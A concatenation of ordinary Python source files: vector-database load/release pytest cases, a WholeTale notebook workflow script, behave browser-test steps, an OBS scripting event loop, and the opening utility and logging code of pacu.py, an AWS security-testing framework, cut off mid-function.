target: test release collection during searching
method: insert entities into collection, flush and load collection, release collection during searching
expected: searching after release raises an exception
"""
nq = 1000
top_k = 1
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
future = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def test_release_partition_during_searching(self, connect, collection):
"""
target: test release partition during searching
method: insert entities into partition, flush and load partition, release partition during searching
expected: search returns an empty result after the partition is released
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_collection_during_searching_A(self, connect, collection):
"""
target: test release collection during searching
method: insert entities into partition, flush and load partition, release collection during searching
expected: searching after the collection is released raises an exception
"""
nq = 1000
top_k = 1
connect.create_partition(collection, default_tag)
query, _ = gen_query_vectors(field_name, default_entities, top_k, nq)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, _async=True)
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_collection_during_loading(self, connect, collection):
"""
target: test release collection during loading
method: insert entities into collection, flush, release collection during loading
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
connect.search(collection, default_single_query)
def _test_release_partition_during_loading(self, connect, collection):
"""
target: test release partition during loading
method: insert entities into partition, flush, release partition during loading
expected:
"""
connect.create_partition(collection, default_tag)
connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
def load():
connect.load_collection(collection)
t = threading.Thread(target=load, args=())
t.start()
connect.release_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
def _test_release_collection_during_inserting(self, connect, collection):
"""
target: test release collection during inserting
method: load collection, do release collection during inserting
expected:
"""
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def insert():
connect.insert(collection, default_entities)
t = threading.Thread(target=insert, args=())
t.start()
connect.release_collection(collection)
with pytest.raises(Exception):
res = connect.search(collection, default_single_query)
# assert len(res[0]) == 0
def _test_release_collection_during_indexing(self, connect, collection):
"""
target: test release collection during building index
method: insert and flush, load collection, do release collection during creating index
expected:
"""
pass
def _test_release_collection_during_droping_index(self, connect, collection):
"""
target: test release collection during dropping index
method: insert, create index and flush, load collection, do release collection during dropping index
expected:
"""
pass
class TestLoadCollectionInvalid(object):
"""
Test load collection with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.load_collection(collection_name)
@pytest.mark.level(2)
def test_release_collection_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
connect.release_collection(collection_name)
class TestLoadPartition:
"""
******************************************************************
The following cases are used to test `load_partitions` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in cpu mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_binary_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
else:
pytest.skip("Skip index Temporary")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index(self, connect, collection, get_simple_index):
'''
target: test load partition, after index created
method: insert into a partition and create index, load the partition with correct params
expected: no error raised
'''
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.create_index(collection, default_float_vec_field_name, get_simple_index)
search_param = get_search_param(get_simple_index["index_type"])
query, vecs = gen_query_vectors(field_name, default_entities, default_top_k, nq=1, search_params=search_param)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, query, partition_names=[default_tag])
assert len(res[0]) == default_top_k
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_after_index_binary(self, connect, binary_collection, get_binary_index):
'''
target: test load partition of binary_collection, after index created
method: insert into a partition and create index, load the partition with correct params
expected: no error raised
'''
connect.create_partition(binary_collection, default_tag)
ids = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([binary_collection])
for metric_type in binary_metrics():
logging.getLogger().info(metric_type)
get_binary_index["metric_type"] = metric_type
if get_binary_index["index_type"] == "BIN_IVF_FLAT" and metric_type in structure_metrics():
with pytest.raises(Exception) as e:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
else:
connect.create_index(binary_collection, default_binary_vec_field_name, get_binary_index)
connect.load_partitions(binary_collection, [default_tag])
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_empty_partition(self, connect, collection):
'''
target: test load empty partition
method: no entities in the partition, load the partition with correct params
expected: load success, search returns empty
'''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_load_collection_dis_connect(self, connect, dis_connect, collection):
'''
target: test load partitions, without connection
method: load partitions with correct params, with a disconnected instance
expected: load raise exception
'''
connect.create_partition(collection, default_tag)
with pytest.raises(Exception) as e:
dis_connect.load_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_release_partition_dis_connect(self, connect, dis_connect, collection):
'''
target: test release partitions, without connection
method: release partitions with correct params, with a disconnected instance
expected: release raise exception
'''
connect.create_partition(collection, default_tag)
connect.load_partitions(collection, [default_tag])
with pytest.raises(Exception) as e:
dis_connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.load_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_existed(self, connect, collection):
partition_name = gen_unique_str(uid)
try:
connect.release_partitions(collection, [partition_name])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % partition_name
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_not_load(self, connect, collection):
"""
target: test release partition without load
method: insert into the partition and flush, then release the partition without loading it
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.release_partitions(collection, [default_tag])
@pytest.mark.level(2)
def test_load_release_after_drop(self, connect, collection):
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_release_partition_after_drop(self, connect, collection):
"""
target: test load/release partition after drop
method: insert and flush, load the partition, drop it, then load it again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.drop_partition(collection, default_tag)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "partitionID of partitionName:%s can not be find" % default_tag
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_load_release_after_collection_drop(self, connect, collection):
"""
target: test load/release partition after the collection is dropped
method: insert and flush, load and release the partition, drop the collection, then load/release the partition again
expected: raise exception
"""
connect.create_partition(collection, default_tag)
ids = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(ids) == default_nb
connect.flush([collection])
connect.load_partitions(collection, [default_tag])
connect.release_partitions(collection, [default_tag])
connect.drop_collection(collection)
try:
connect.load_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
try:
connect.release_partitions(collection, [default_tag])
except Exception as e:
code = getattr(e, 'code', "The exception does not contain the field of code.")
assert code == 1
message = getattr(e, 'message', "The exception does not contain the field of message.")
assert message == "describe collection failed: can't find collection: %s" % collection
class TestLoadPartitionInvalid(object):
"""
Test load partition with invalid params
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_partition_name(self, request):
yield request.param
@pytest.mark.level(2)
def test_load_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.load_partitions(collection, [partition_name])
@pytest.mark.level(2)
def test_release_partition_with_invalid_partition_name(self, connect, collection, get_partition_name):
partition_name = get_partition_name
with pytest.raises(Exception) as e:
connect.release_partitions(collection, [partition_name])
|
workflow.py
|
import datetime
import json
import os
import tempfile
import threading
import time
from hashlib import md5
from pathlib import Path
import sseclient
from girder_client import GirderClient
class InstanceStatus:
LAUNCHING = 0
RUNNING = 1
ERROR = 2
def md5sum(filename, buf_size=8192):
m = md5()
# the with statement makes sure the file will be closed
if filename.is_dir():
return
with open(filename, "rb") as f:
# We read the file in small chunks until EOF
data = f.read(buf_size)
while data:
# We add the data to the md5 hash
m.update(data)
data = f.read(buf_size)
# We return the md5 hash in hex
return m.hexdigest()
def event_listener(gc):
stream = gc.sendRestRequest(
"GET",
"/notification/stream",
stream=True,
headers={"Accept": "text/event-stream"},
jsonResp=False,
parameters={"since": int(datetime.datetime.now().timestamp())},
)
client = sseclient.SSEClient(stream)
for event in client.events():
data = json.loads(event.data)
if data["type"] == "wt_progress":
progress = int(data["data"]["current"] / data["data"]["total"] * 100.0)
msg = (
" -> event received:"
f" msg = {data['data']['message']}"
f" status = {data['data']['state']}"
f" progress = {progress}%"
)
print(msg)
class Manuscript:
"""Pseudo core2 <-> WT interface.
We are going to map Manuscript to Tale and Submission to Version.
"""
def __init__(self, api_url="https://girder.stage.wholetale.org/api/v1"):
self.gc = GirderClient(apiUrl=api_url)
self.gc.authenticate(apiKey=os.environ.get("GIRDER_API_KEY"))
self.tale = self.create_tale()
self.sse_handler = threading.Thread(
target=event_listener, args=(self.gc,), daemon=False
)
self.sse_handler.start()
def default_image(self):
images = self.gc.get("/image", parameters={"text": "Jupyter"})
return images[0]
def create_tale(self, image=None):
if image is None:
image = self.default_image()
tale = self.gc.post("/tale", json={"imageId": image["_id"], "dataSet": []})
return tale
def create_submission(self, name=None, path=None):
"""
path needs to point to a directory with submission files
"""
# upload path
for fname in path.iterdir():
self.gc.uploadFileToFolder(self.tale["workspaceId"], fname)
# Finalize an immutable "submission"
parameters = {"taleId": self.tale["_id"]}
if name is not None:
parameters["name"] = name
version = self.gc.post("/version", parameters=parameters)
return version
def run(self, submissionId=None):
if submissionId is not None:
print("We would revert to that version. Pass now")
instance = self.gc.post("/instance", parameters={"taleId": self.tale["_id"]})
while instance["status"] == InstanceStatus.LAUNCHING:
time.sleep(2)
instance = self.gc.get(f"/instance/{instance['_id']}")
return instance
def stop(self, instance):
self.gc.delete(f"/instance/{instance['_id']}")
def download_submission(self, path, folder_id=None):
if folder_id is None:
folder_id = self.tale["workspaceId"] # otherwise it should be version
self.gc.downloadFolderRecursive(folder_id, path)
@staticmethod
def compare_submission(new, old):
new_files = set(_.name for _ in new.iterdir())
old_files = set(_.name for _ in old.iterdir())
if diff := new_files - old_files:
print(" New files:")
for name in diff:
print(f" -> {name}")
if diff := old_files - new_files:
print(" Removed files:")
for name in diff:
print(f" -> {name}")
for name in new_files & old_files:
new_sum = md5sum(new / name)
old_sum = md5sum(old / name)
if new_sum != old_sum:
print(f"File {name} was modified!!! (md5sum differs)")
print("[*] Creating a new Manuscript")
manuscript = Manuscript()
print("[*] Creating submission and uploading data")
path = Path(os.path.dirname(__file__)) / "example_submission"
manuscript.create_submission(name="Submission no. 1", path=path)
print("[*] Starting Jupyter notebook (this may take a while...)")
binder = manuscript.run()
print("----")
print(f" Open your browser and go to: {binder['url']}")
print(" Make sure to run 'run_me.ipynb'")
input(" After you're done with notebook press Enter to continue...")
manuscript.stop(binder)
with tempfile.TemporaryDirectory() as tmpdirname:
print("[*] Created temporary directory for submission", path)
manuscript.download_submission(tmpdirname)
print(
"[*] Comparing files pre/post execution "
"(ultimately can happen on the backend)"
)
manuscript.compare_submission(Path(tmpdirname), path)
print("[*] Cleaning up...")
print("Press CTRL-C to exit")
|
basic_germanim_test.py
|
from behave import *
from time import sleep
import os
import re
import threading
from germanium.static import *
from features.steps.asserts import *
use_step_matcher("re")
URL_MATCHER=re.compile(r"^(https?://)(.*?)(/.*)$")
def instantiate_germanium_webdriver():
browser = "firefox"
if 'TEST_BROWSER' in os.environ:
browser = os.environ['TEST_BROWSER']
def iframe_selector(germanium, iframe_name):
if iframe_name == 'iframe':
iframe = germanium.S('iframe').element()
germanium.switch_to_frame(iframe)
else:
germanium.switch_to_default_content()
open_browser(browser,
iframe_selector=iframe_selector)
@step("I open the browser")
def open_browser_step(context):
"""
:param context:
:return: void
"""
if not get_germanium():
instantiate_germanium_webdriver()
@step("I go to '(?P<page>.*?)'")
@step("I navigate to '(?P<page>.*?)'")
def navigate_to_page(context, page):
"""
Navigate to the given URL.
:param context:
:param page:
:return:
"""
if 'TEST_HOST' in os.environ:
page_matcher = URL_MATCHER.match(page)
page = page_matcher.group(1) + \
os.environ['TEST_HOST'] + \
page_matcher.group(3)
go_to(page)
@step(u'I type \'(?P<keys>.*?)\' into (?P<selector>.*)')
def type_keys_with_selector(context, keys, selector):
type_keys(keys, selector)
@step(u'the value for the (?P<selector>.*) is \'(?P<value>.*?)\'')
def step_impl(context, selector, value):
element = S(selector).element()
assert_equals(value, get_value(element))
@step("the title of the page equals '(?P<what>.*?)'")
def check_title_page(context, what):
assert_equals(what, get_germanium().title)
@step(u'I type_keys \'(?P<what>.*?)\'')
def type_keys_impl(context, what):
type_keys(what)
@step(u"in the selector (.*?) I type_keys '(.*?)'")
def type_keys_impl(context, selector, keys):
type_keys(keys, selector)
@step(u"in the locator (.*?) I type_keys '(.*?)'")
def type_keys_impl(context, selector, keys):
type_keys(keys, S(selector))
@step(u"in the locator (.*?) I type_keys '(.*?)' with 200ms delay")
def type_keys_impl(context, selector, keys):
type_keys(keys, S(selector), delay=0.2)
@step(u"I click on '(.*)'")
def step_impl(context, selector):
click(selector)
@step(u'the text of the page is')
def step_impl(context):
assert_equals(context.text, Element('body').element().text)
@step(u"the text of the page contains '(.*?)'")
def step_impl(context, text):
assert_true(text in Element('body').text())
@step(u"the text of the page doesn't contain '(.*?)'")
def step_impl(context, text):
assert_true(text not in Element('body').text())
@step(u'I wait forever')
def step_impl(context):
sleep(10000000)
@step(u'the I can read from a different thread the title of the page as \'(.*?)\'')
def step_impl(context, title):
def check_title():
assert_equals(title, get_germanium().title)
t = threading.Thread(target=check_title)
t.start()
t.join()
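# Illustrative sketch only: a Gherkin scenario these step definitions could back.
# The URL and the expected title are made-up values, not taken from this repository's
# feature files.
#
#   Scenario: Open a page and check its title
#     Given I open the browser
#     And I navigate to 'http://example.com/index.html'
#     Then the title of the page equals 'Example Domain'
#     And the text of the page contains 'Example'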
|
loop.py
|
import obspython as _obs
import threading
import traceback
from . import data as _data
from . import _helper
class Future:
_NOTSET = object()
_EXCEPTION = object()
_INTERRUPT = object()
_WAITING = []
def __init__(self):
self._result = self._NOTSET
self._exception = None
self._lock = {}
def has_result(self):
return self._result is not self._NOTSET
def result(self, timeout=-1):
r = self._result
if r is not self._NOTSET:
if r is self._EXCEPTION:
raise RuntimeError(self._exception)
elif r is self._INTERRUPT:
raise KeyboardInterrupt(self._exception)
return r
l = self._lock.get("o")
if l is None:
l = threading.Lock()
l.acquire()
l = self._lock.setdefault("o", l)
r = self._result
if r is self._NOTSET:
self._WAITING.append(self)
try:
if not l.acquire(timeout=timeout):
raise TimeoutError()
finally:
self._WAITING.remove(self)
r = self._result
if r is self._NOTSET:
raise TimeoutError()
if r is self._EXCEPTION:
raise RuntimeError(self._exception)
elif r is self._INTERRUPT:
raise KeyboardInterrupt(self._exception)
return r
def set_result(self, value):
self._result = value
l = self._lock.pop("o", None)
if l is not None:
l.release()
def set_exception(self, message):
self._exception = message
self.set_result(self._EXCEPTION)
def interrupt(self, message):
self._exception = message
self.set_result(self._INTERRUPT)
class _SourceReleaser:
def __init__(self, source, returns=None, is_sceneitem=False):
self._source = source
self._returns = returns
self._is_sceneitem = is_sceneitem
def __enter__(self):
return self._returns or self._source
def __exit__(self, exc_type, exc_value, exc_tb):
if self._is_sceneitem:
_obs.obs_sceneitem_release(self._source)
else:
_obs.obs_source_release(self._source)
class Loop:
def __init__(self):
self.steps = []
self.interval = 10
self.steps_per_interval = 10
self._tls = threading.local()
self._tls.abort = Future()
self._tls.is_main = True
self._threads = []
self._started = False
def _process(self):
if not self.steps:
return
todo = self.steps_per_interval
steps = self.steps
while steps and todo > 0:
fn, args, future = steps.pop(0)
try:
r = fn(*args)
if future:
future.set_result(r)
except Exception as ex:
_obs.remove_current_callback()
self._started = False
if future:
future.set_exception(ex)
traceback.print_exc()
return
steps = self.steps
todo -= 1
def start(self):
if not self._started:
self._started = True
_obs.timer_add(self._process, self.interval)
def reset(self):
threads, self._threads = self._threads, []
self.steps = []
for t in threads:
t.interrupt("Resetting")
for f in Future._WAITING:
f.interrupt("Resetting")
self.start()
def schedule(self, cmd, *args, future=None, always=False):
self.schedule_call(getattr(self, "_" + cmd), *args, future=future, always=always)
def schedule_call(self, callable, *args, future=None, always=False):
if not always:
try:
abort = self._tls.abort
except AttributeError:
pass
else:
if abort.has_result():
raise KeyboardInterrupt
if self._tls.is_main:
try:
r = callable(*args)
except Exception as ex:
if future:
future.set_exception(ex)
else:
if future:
future.set_result(r)
return
self.steps.append((callable, args, future))
def _source_by_name(self, name):
s = _obs.obs_get_source_by_name(name)
if not s:
raise LookupError("no source named {}".format(name))
return _SourceReleaser(s)
def _filter_by_name(self, source_name, filter_name):
s = _obs.obs_get_source_by_name(source_name)
if not s:
raise LookupError("no source named {}".format(source_name))
try:
f = _obs.obs_source_get_filter_by_name(s, filter_name)
if not f:
raise LookupError("no filter named {} on source {}".format(filter_name, source_name))
return _SourceReleaser(f)
finally:
_obs.obs_source_release(s)
def _sceneitem_by_name(self, scene_name, name):
with self._source_by_name(scene_name) as source:
scene = _obs.obs_scene_from_source(source)
if not scene:
raise LookupError("no scene named {}".format(scene_name))
i = _obs.obs_scene_find_source_recursive(scene, name)
if i is None:
raise LookupError("no sceneitem named {}".format(name))
_obs.obs_sceneitem_addref(i)
return _SourceReleaser(i, is_sceneitem=True)
def _updated(self, props, data, values, on_update):
for p in props:
values.update(p._get(data))
if on_update:
on_update()
def _new_thread(self, callable):
def _starter():
self._tls.abort = a = Future()
self._tls.is_main = False
self._threads.append(a)
try:
callable()
except KeyboardInterrupt:
pass
t = threading.Thread(target=_starter)
t.start()
def _obs_source_get_type(self, source_name):
with self._source_by_name(source_name) as s:
return _obs.obs_source_get_unversioned_id(s)
def _obs_source_get_property_values(self, source_name):
with self._source_by_name(source_name) as s:
d = _obs.obs_source_get_settings(s)
try:
return _data.get_values(d)
finally:
_obs.obs_data_release(d)
def _obs_source_set_property_values(self, source_name, values):
with self._source_by_name(source_name) as s:
d = _obs.obs_data_create()
try:
_data.set_data(d, values.items())
_obs.obs_source_update(s, d)
finally:
_obs.obs_data_release(d)
def _obs_filter_get_property_values(self, filter_name, owner_name):
with self._filter_by_name(owner_name, filter_name) as s:
d = _obs.obs_source_get_settings(s)
try:
return _data.get_values(d)
finally:
_obs.obs_data_release(d)
def _obs_filter_set_property_values(self, filter_name, owner_name, values):
with self._filter_by_name(owner_name, filter_name) as s:
d = _obs.obs_data_create()
try:
_data.set_data(d, values.items())
_obs.obs_source_update(s, d)
finally:
_obs.obs_data_release(d)
def _obs_source_get_frame_data(self, source_name):
with self._source_by_name(source_name) as s:
return _helper.render_source_to_data(s)
def _close_object(self, obj):
obj.close()
def _obs_sceneitem_get_pos(self, scene_name, source_name):
with self._sceneitem_by_name(scene_name, source_name) as si:
p = _obs.vec2()
_obs.obs_sceneitem_get_pos(si, p)
return p.x, p.y
def _obs_sceneitem_set_pos(self, scene_name, source_name, pos):
with self._sceneitem_by_name(scene_name, source_name) as si:
p = _obs.vec2()
p.x, p.y = pos
_obs.obs_sceneitem_set_pos(si, p)
def _obs_sceneitem_get_crop(self, scene_name, source_name):
with self._sceneitem_by_name(scene_name, source_name) as si:
crop = _obs.obs_sceneitem_crop()
_obs.obs_sceneitem_get_crop(si, crop)
return crop.left, crop.right, crop.top, crop.bottom
def _obs_sceneitem_set_crop(self, scene_name, source_name, crop_sizes):
with self._sceneitem_by_name(scene_name, source_name) as si:
crop = _obs.obs_sceneitem_crop()
crop.left, crop.right, crop.top, crop.bottom = crop_sizes
_obs.obs_sceneitem_set_crop(si, crop)
def _obs_source_get_sync_offset(self, source_name):
with self._source_by_name(source_name) as s:
return _obs.obs_source_get_sync_offset(s)
def _obs_source_set_sync_offset(self, source_name, offset):
with self._source_by_name(source_name) as s:
_obs.obs_source_set_sync_offset(s, offset)
def _obs_source_get_filters(self, source_name, filter_cls):
with self._source_by_name(source_name) as s:
return [filter_cls(n, k)
for n, k in _helper.get_filter_names(s)]
LOOP = Loop()
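# Illustrative sketch only: how another module in this package might drive the shared
# LOOP instance from a worker (non-main) thread. "Scene", "Text Source" and the position
# values are made-up names.
#
# f = Future()
# LOOP.start()
# LOOP.schedule_call(LOOP._obs_source_get_property_values, "Text Source", future=f)
# values = f.result(timeout=5)   #blocks the calling thread until the OBS timer tick runs the call
# LOOP.schedule("obs_sceneitem_set_pos", "Scene", "Text Source", (100, 200))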
|
pacu.py
|
#!/usr/bin/env python3
import copy
import importlib
import json
import os
import platform
from queue import Queue
import random
import re
import shlex
import string
import subprocess
import sys
import threading
import time
import traceback
from http.server import BaseHTTPRequestHandler, HTTPServer
try:
import requests
import boto3
import botocore
import configure_settings
import settings
from core.models import AWSKey, PacuSession, ProxySettings
from proxy import PacuProxy
from setup_database import setup_database_if_not_present
from utils import get_database_connection, set_sigint_handler
except ModuleNotFoundError as error:
exception_type, exception_value, tb = sys.exc_info()
print('Traceback (most recent call last):\n{}{}: {}\n'.format(''.join(traceback.format_tb(tb)), str(exception_type), str(exception_value)))
print('Pacu was not able to start because a required Python package was not found.\nRun `sh install.sh` to check and install Pacu\'s Python requirements.')
sys.exit(1)
class Main:
COMMANDS = [
'aws', 'data', 'exec', 'exit', 'help', 'import_keys', 'list', 'load_commands_file',
'ls', 'proxy', 'quit', 'regions', 'run', 'search', 'services', 'set_keys',
'set_regions', 'swap_keys', 'update_regions', 'whoami'
]
def __init__(self):
self.database = None
self.server = None
self.proxy = None
self.queue = None
self.running_module_names = []
# Utility methods
def log_error(self, text, exception_info=None, session=None, local_data=None, global_data=None):
""" Write an error to the file at log_file_path, or a default log file
if no path is supplied. If a session is supplied, its name will be used
to determine which session directory to add the error file to. """
timestamp = time.strftime('%F %T', time.gmtime())
if session:
session_tag = '({})'.format(session.name)
else:
session_tag = '<No Session>'
try:
if session:
log_file_path = 'sessions/{}/error_log.txt'.format(session.name)
else:
log_file_path = 'global_error_log.txt'
print('\n[{}] Pacu encountered an error while running the previous command. Check {} for technical details. [LOG LEVEL: {}]\n\n {}\n'.format(timestamp, log_file_path, settings.ERROR_LOG_VERBOSITY.upper(), exception_info))
log_file_directory = os.path.dirname(log_file_path)
if log_file_directory and not os.path.exists(log_file_directory):
os.makedirs(log_file_directory)
formatted_text = '[{}] {}: {}'.format(timestamp, session_tag, text)
if settings.ERROR_LOG_VERBOSITY.lower() in ('low', 'high', 'extreme'):
if session:
session_data = session.get_all_fields_as_dict()
# Empty values are not valid keys, and that info should be
# preserved by checking for falsiness here.
if session_data.get('secret_access_key'):
session_data['secret_access_key'] = '****** (Censored)'
formatted_text += 'SESSION DATA:\n {}\n'.format(
json.dumps(
session_data,
indent=4,
default=str
)
)
if settings.ERROR_LOG_VERBOSITY.lower() == 'high':
if local_data is not None and global_data is not None:
formatted_text += '\nLAST TWO FRAMES LOCALS DATA:\n {}\n'.format('\n\n '.join(local_data[:2]))
formatted_text += '\nLAST TWO FRAMES GLOBALS DATA:\n {}\n'.format('\n\n '.join(global_data[:2]))
elif settings.ERROR_LOG_VERBOSITY.lower() == 'extreme':
if local_data is not None and global_data is not None:
formatted_text += '\nALL LOCALS DATA:\n {}\n'.format('\n\n '.join(local_data))
formatted_text += '\nALL GLOBALS DATA:\n {}\n'.format('\n\n '.join(global_data))
formatted_text += '\n'
with open(log_file_path, 'a+') as log_file:
log_file.write(formatted_text)
except Exception as error:
print('Error while saving exception information. This means the exception was not added to any error log and should most likely be provided to the developers.\n Exception raised: {}'.format(str(error)))
raise
# @message: String - message to print and/or write to file
# @output: String - where to output the message: both, file, or screen
# @output_type: String - format for message when written to file: plain or xml
# @is_cmd: boolean - Is the log the initial command that was run (True) or output (False)? Devs won't touch this most likely
def print(self, message='', output='both', output_type='plain', is_cmd=False, session_name=''):
session = self.get_active_session()
if session_name == '':
session_name = session.name
# Indent output from a command
if is_cmd is False:
# Add some recursion here to go through the entire dict for
# 'SecretAccessKey'. This is to not print the full secret access
# key into the logs, although this should get most cases currently.
if isinstance(message, dict):
if 'SecretAccessKey' in message:
message = copy.deepcopy(message)
message['SecretAccessKey'] = '{}{}'.format(message['SecretAccessKey'][0:int(len(message['SecretAccessKey']) / 2)], '*' * int(len(message['SecretAccessKey']) / 2))
message = json.dumps(message, indent=2, default=str)
elif isinstance(message, list):
message = json.dumps(message, indent=2, default=str)
# The next section prepends the running module's name in square
# brackets in front of the first line in the message containing
# non-whitespace characters.
if len(self.running_module_names) > 0 and isinstance(message, str):
split_message = message.split('\n')
for index, fragment in enumerate(split_message):
if re.sub(r'\s', '', fragment):
split_message[index] = '[{}] {}'.format(self.running_module_names[-1], fragment)
break
message = '\n'.join(split_message)
if output == 'both' or output == 'file':
if output_type == 'plain':
with open('sessions/{}/cmd_log.txt'.format(session_name), 'a+') as text_file:
text_file.write('{}\n'.format(message))
elif output_type == 'xml':
# TODO: Implement actual XML output
with open('sessions/{}/cmd_log.xml'.format(session_name), 'a+') as xml_file:
xml_file.write('{}\n'.format(message))
pass
else:
print(' Unrecognized output type: {}'.format(output_type))
if output == 'both' or output == 'screen':
print(message)
return True
# @message: String - input question to ask and/or write to file
# @output: String - where to output the message: both or screen (can't write a question to a file only)
# @output_type: String - format for message when written to file: plain or xml
def input(self, message, output='both', output_type='plain', session_name=''):
session = self.get_active_session()
if session_name == '':
session_name = session.name
if len(self.running_module_names) > 0 and isinstance(message, str):
split_message = message.split('\n')
for index, fragment in enumerate(split_message):
if re.sub(r'\s', '', fragment):
split_message[index] = '[{}] {}'.format(self.running_module_names[-1], fragment)
break
message = '\n'.join(split_message)
res = input(message)
if output == 'both':
if output_type == 'plain':
with open('sessions/{}/cmd_log.txt'.format(session_name), 'a+') as file:
file.write('{} {}\n'.format(message, res))
elif output_type == 'xml':
# TODO: Implement actual XML output
# now = time.time()
with open('sessions/{}/cmd_log.xml'.format(session_name), 'a+') as file:
file.write('{} {}\n'.format(message, res))
else:
print(' Unrecognized output type: {}'.format(output_type))
return res
def validate_region(self, region):
if region in self.get_regions('All'):
return True
return False
def get_regions(self, service, check_session=True):
session = self.get_active_session()
service = service.lower()
with open('./modules/service_regions.json', 'r+') as regions_file:
regions = json.load(regions_file)
# TODO: Add an option for GovCloud regions
if service == 'all':
return regions['all']
if 'aws-global' in regions[service]['endpoints']:
return [None]
if 'all' in session.session_regions:
valid_regions = list(regions[service]['endpoints'].keys())
if 'local' in valid_regions:
valid_regions.remove('local')
return valid_regions
else:
valid_regions = list(regions[service]['endpoints'].keys())
if 'local' in valid_regions:
valid_regions.remove('local')
if check_session is True:
return [region for region in valid_regions if region in session.session_regions]
else:
return valid_regions
def display_all_regions(self, command):
for region in sorted(self.get_regions('all')):
print(' {}'.format(region))
# @data: list
# @module: string
# @args: string
def fetch_data(self, data, module, args, force=False):
session = self.get_active_session()
if data is None:
current = None
else:
current = getattr(session, data[0], None)
for item in data[1:]:
if current is not None and item in current:
current = current[item]
else:
current = None
break
if current is None or current == '' or current == [] or current == {} or current is False:
if force is False:
